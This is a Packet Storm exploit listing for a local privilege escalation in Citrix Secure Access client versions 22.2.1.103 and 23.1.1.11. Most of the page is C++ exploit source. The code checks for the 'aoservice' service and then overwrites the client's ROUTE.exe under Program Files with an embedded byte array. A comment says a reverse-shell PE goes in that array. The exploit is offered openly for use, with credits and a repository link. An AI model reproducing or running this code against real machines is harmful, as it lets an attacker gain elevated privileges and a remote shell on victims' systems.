what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Citrix 22.2.1.103 / 23.1.1.11 Local Privilege Escalation

Citrix 22.2.1.103 / 23.1.1.11 Local Privilege Escalation
Posted Apr 5, 2023
Authored by Touhami Kasbaoui

Citrix versions 22.2.1.103 and 23.1.1.11 suffer from a local privilege escalation vulnerability.

tags | exploit, local
SHA-256 | 21c9799f301f0eda80e9786ef79986d3f1337fed74138ce1f0c4fb9936e76032

Citrix 22.2.1.103 / 23.1.1.11 Local Privilege Escalation

Change Mirror Download
//Discovered by:: TOUHAMI KASBAOUI - VXREMALWARE
//Discover date : 25/03/2023
//Reported to Citrix: 25/03/2023
//Tested Version: 22.2.1.103, 23.1.1.11/Last version
//Exploit: https://github.com/sqrtZeroKnowledge/Citrix_Secure_Access_LPE_0DAY


#define UNICODE
#define _UNICODE
#include <Windows.h>
#include <string>
#include <iostream>
#include <Windows.h>
#include <iostream>

using namespace std;
enum Result
{
unknown,
serviceManager_AccessDenied,
serviceManager_DatabaseDoesNotExist,
service_AccessDenied,
service_InvalidServiceManagerHandle,
service_InvalidServiceName,
service_DoesNotExist,
service_Exist
};

Result ServiceExists(const std::wstring& serviceName)
{
Result r = unknown;

SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);

if (manager == NULL)
{
DWORD lastError = GetLastError();

if (lastError == ERROR_ACCESS_DENIED)
return serviceManager_AccessDenied;
else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)
return serviceManager_DatabaseDoesNotExist;
else
return unknown;
}

SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);

if (service == NULL)
{
DWORD error = GetLastError();

if (error == ERROR_ACCESS_DENIED)
r = service_AccessDenied;
else if (error == ERROR_INVALID_HANDLE)
r = service_InvalidServiceManagerHandle;
else if (error == ERROR_INVALID_NAME)
r = service_InvalidServiceName;
else if (error == ERROR_SERVICE_DOES_NOT_EXIST)
r = service_DoesNotExist;
else
r = unknown;
}
else
r = service_Exist;

if (service != NULL)
CloseServiceHandle(service);

if (manager != NULL)
CloseServiceHandle(manager);

return r;
}

int main() {

const uint8_t shellcode[7168] = {
0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
}; //You can set array bin of your reverse shell PE file here

std::wstring serviceName = L"aoservice";
Result result = ServiceExists(serviceName);
if (result == service_Exist)
std::wcout << L"The service '" << serviceName << "' exists." << std::endl;
else if (result == service_DoesNotExist)
std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;
else
std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;

HANDLE fileHandle = CreateFile(L"C:\\Program Files\\Citrix\\Secure Access Client\\ROUTE.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
cerr << "[*] Loading Malicious file into Citric Secure Access Installer \n";
if (fileHandle == INVALID_HANDLE_VALUE) {
cerr << "Failed to create shellcode\n";
return 1;
}

DWORD bytesWritten;
if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {
cerr << "Failed to write to file\n";
CloseHandle(fileHandle);
return 1;
}
CloseHandle(fileHandle);

cout << "Shellcode exported to Citrix Secure Access path \n";
return 0;
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close